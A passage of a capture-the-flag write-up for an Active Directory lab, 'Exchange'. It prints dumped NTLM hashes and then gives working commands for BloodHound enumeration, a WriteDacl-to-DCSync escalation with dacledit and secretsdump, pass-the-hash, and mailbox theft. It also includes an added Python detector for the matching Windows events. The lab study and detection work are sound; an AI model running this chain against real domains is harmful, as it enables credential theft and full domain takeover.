* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : 12 ae e6 f2 22 80 c0 a3 cd 84 c9 94 de ef 96 52 79 ff ea 99 f6 9c 67 48 10 08 e7 99 1a fa 51 11 ad b6 c1 79 cc 6d 04 b2 22 01 47 b0 53 b5 7e ff df 04 21 34 ae 7b ee c9 cf b1 c1 d3 c0 63 d3 d7 6a f2 3a 38 83 ac cf d2 93 7b d3 0b bb d6 a5 8d 7c cd f1 77 65 0b 8c 77 dd 98 49 3c 21 f0 5d fc a7 8f c7 e0 5b f7 96 4d d2 46 14 81 8f 4f a7 a4 27 11 09 03 f9 f4 0d ce 71 4d 8d 64 c3 a9 6b 5c 4a 77 ba ac 33 1a 49 60 11 bd 4d b2 1e 98 05 1a c1 03 5b c6 cf 4e 1c d3 83 10 52 51 68 c4 b1 e0 65 c2 36 f3 a6 3f 66 c6 95 8c 3d 47 ab 9b cb 35 bd 53 f0 6f 13 ae 48 28 5e cf 5b ee 45 ce 7f 10 47 aa e6 f0 d3 09 c0 b3 ad ef 24 00 c5 c8 f0 7f a5 06 93 0e f5 a4 2a ec d0 25 96 4d a4 88 d3 55 94 d9 94 81 ef 8b ba 9e 89 b6 36 dc 88 64 8d 96
ssp :
credman :

mimikatz(commandline) # exit
Bye!

The output contains hashes for two accounts of interest:

* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b

* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 535602bb7f4523e2979148feee2cc749
* SHA1 : b39f4a0ec7de08a72d6e5dfcee3d844967136734

Then run BloodHound for domain enumeration:

┌──(root㉿kali)-[~/Desktop/tools/BloodHound-python]
└─# proxychains python3 bloodhound.py -u "XIAORANG-EXC01$" --hashes :535602bb7f4523e2979148feee2cc749 -d xiaorang.lab -dc XIAORANG-WIN16.xiaorang.lab -c all --dns-tcp -ns 172.22.3.2 --auth-method ntlm --zip

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: xiaorang.lab
INFO: Connecting to LDAP server: XIAORANG-WIN16.xiaorang.lab
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: XIAORANG-WIN16.xiaorang.lab
INFO: Found 28 users
INFO: Found 73 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 22 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: XIAORANG-PC.xiaorang.lab
INFO: Querying computer: XIAORANG-EXC01.xiaorang.lab
INFO: Querying computer: XIAORANG-WIN16.xiaorang.lab
INFO: Done in 00M 37S
INFO: Compressing output into 20250301203721_bloodhound.zip

We find that the Exchange machine account has WriteDacl rights, so we can grant ourselves DCSync rights and then dump the domain admin's hash. Reference: Using WriteDacl held by the Exchange server for domain privilege escalation (使用Exchange服务器中的Writedacl实现域提权的提权)


proxychains python3 dacledit.py xiaorang.lab/XIAORANG-EXC01$ -hashes :535602bb7f4523e2979148feee2cc749 -action write -rights DCSync -principal XIAORANG-EXC01$ -target-dn 'dc=xiaorang,dc=lab' -dc-ip 172.22.3.2

The modification succeeded.


But when I tried, the hashes would not dump. (Probably a re-login was needed; later I realised that I had RDP'd in as fffffilm while the right had been granted to XIAORANG-EXC01$, so the dump failed.)

In the end I granted DCSync rights to the Zhangtong user instead and got the hashes.

# grant the right
proxychains python3 dacledit.py xiaorang.lab/XIAORANG-EXC01$ -hashes :535602bb7f4523e2979148feee2cc749 -action write -rights DCSync -principal Zhangtong -target-dn 'dc=xiaorang,dc=lab' -dc-ip 172.22.3.2

# dump the hashes
proxychains impacket-secretsdump xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm
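From the defender's side, the two steps above each leave a Windows Security event on the domain controller: a DACL write on the domain object produces event 5136 (directory service object modified, attribute nTSecurityDescriptor), and the replication request itself produces event 4662 carrying the DS-Replication-Get-Changes control-access-right GUIDs. Both require directory-service auditing to be enabled, and 5136 additionally needs a SACL on the domain object. The following Python detection is an added example, not from the original post: the events are constructed to mirror this lab (field subset, names and times assumed; on real logs the 4662 Object Name is usually the object GUID rather than the DN), and DC_ACCOUNTS is an assumption about which principals legitimately replicate.

```python
from datetime import datetime, timedelta

# Control-access-right GUIDs that a DCSync-style replication request exercises; they
# appear in the Properties field of Security event 4662 on the domain controller.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DOMAIN_DN = "DC=xiaorang,DC=lab"            # the target-dn written to above
DC_ACCOUNTS = {"XIAORANG-WIN16$"}           # assumption: the only DC in this lab

# Constructed sample events modelled on Security log IDs 4662 and 5136 (subset of fields).
SAMPLE_EVENTS = [
    {"EventID": 4662, "Time": "2025-03-01T20:10:00", "SubjectUserName": "XIAORANG-WIN16$",
     "ObjectName": DOMAIN_DN,
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 5136, "Time": "2025-03-01T20:41:00", "SubjectUserName": "XIAORANG-EXC01$",
     "ObjectDN": DOMAIN_DN, "AttributeLDAPDisplayName": "nTSecurityDescriptor",
     "OperationType": "%%14674"},            # %%14674 = "Value Added"
    {"EventID": 4662, "Time": "2025-03-01T20:57:00", "SubjectUserName": "Zhangtong",
     "ObjectName": DOMAIN_DN,
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

def replication_rights_used(event):
    """Names of the replication rights referenced in a 4662 event's Properties field."""
    props = event.get("Properties", "").lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]

def detect(events, window=timedelta(hours=2)):
    """Alert on (a) DACL writes to the domain root and (b) replication by non-DC principals.
    A replication alert that follows a DACL write inside `window` is escalated to critical."""
    alerts = []
    acl_changes = []                           # (time, actor) of domain-root DACL writes so far
    for ev in sorted(events, key=lambda e: e["Time"]):
        when = datetime.fromisoformat(ev["Time"])
        actor = ev["SubjectUserName"]
        if (ev["EventID"] == 5136 and ev.get("ObjectDN") == DOMAIN_DN
                and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"):
            acl_changes.append((when, actor))
            alerts.append({"rule": "acl_change_domain_root", "time": ev["Time"],
                           "actor": actor, "severity": "high"})
        elif ev["EventID"] == 4662 and ev.get("ObjectName") == DOMAIN_DN:
            rights = replication_rights_used(ev)
            if not rights or actor in DC_ACCOUNTS:
                continue                       # DCs replicating with each other is normal
            recent = [a for t, a in acl_changes if timedelta(0) <= when - t <= window]
            alerts.append({"rule": "dcsync_by_non_dc", "time": ev["Time"], "actor": actor,
                           "rights": rights,
                           "preceded_by_acl_change": bool(recent),
                           "acl_writers": recent,
                           "severity": "critical" if recent else "high"})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Writing to the domain object's security descriptor is rare enough in normal operation that the 5136 rule alone is worth an alert; the correlation with a following 4662 from a non-DC principal is what separates the WriteDacl-to-DCSync chain described above from a legitimate delegation change.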

image-20250301205758268

Pass-the-hash:

proxychains impacket-smbexec -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/administrator@172.22.3.2 -codec gbk


flag04: flag{03c367e2-684f-41d2-9880-4545f0a92d98}

flag03

When dumping the hashes just now we also obtained the Lumia user's hash, so we can use pthExchange directly to download all of that mailbox's mail: PTH_Exchange

proxychains python3 pthexchange.py --target https://172.22.3.9 --username "Lumia" --password "aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296" --action Download


We get two emails: one contains a secret.zip, the other a CSV file with names and phone numbers.

The mail also says the archive was encrypted with a phone number, so we just extract the phone numbers and brute-force the zip with them.


I had GPT write a script for this:

import csv

# Read the CSV and extract the phone numbers
def extract_phone_numbers(csv_file):
    phone_numbers = []
    with open(csv_file, mode='r', encoding='utf-8') as file:
        reader = csv.reader(file)
        for row in reader:
            if len(row) >= 3:  # make sure the row has at least three columns
                phone_numbers.append(row[2].strip())  # take the third column (index 2)
    return phone_numbers

# Write the phone numbers to pass.txt, one per line
def write_phones_to_file(phone_numbers, output_file="pass.txt"):
    with open(output_file, mode='w', encoding='utf-8') as file:
        for phone in phone_numbers:
            file.write(phone + "\n")

# Usage
csv_file = "item-1-phone lists.csv"  # replace with your file name
phones = extract_phone_numbers(csv_file)
write_phones_to_file(phones)

print("The extracted phone numbers have been saved to pass.txt.")

This recovers the password: 18763918468


And we get the flag.


flag03: flag{cf0c753c-233f-4729-8984-0746ea5878b7}

References

Exchange - 春秋云境 (Chunqiu Cloud Range) | h0ny's blog

[Internal network pentest] The most hand-holding 春秋云镜 Exchange range notes - CSDN blog

春秋云镜 Exchange Writeup - Boogiepop Doesn't Laugh

[WEB] Java JDBC deserialization | 狼组安全团队 (WgpSec) public knowledge base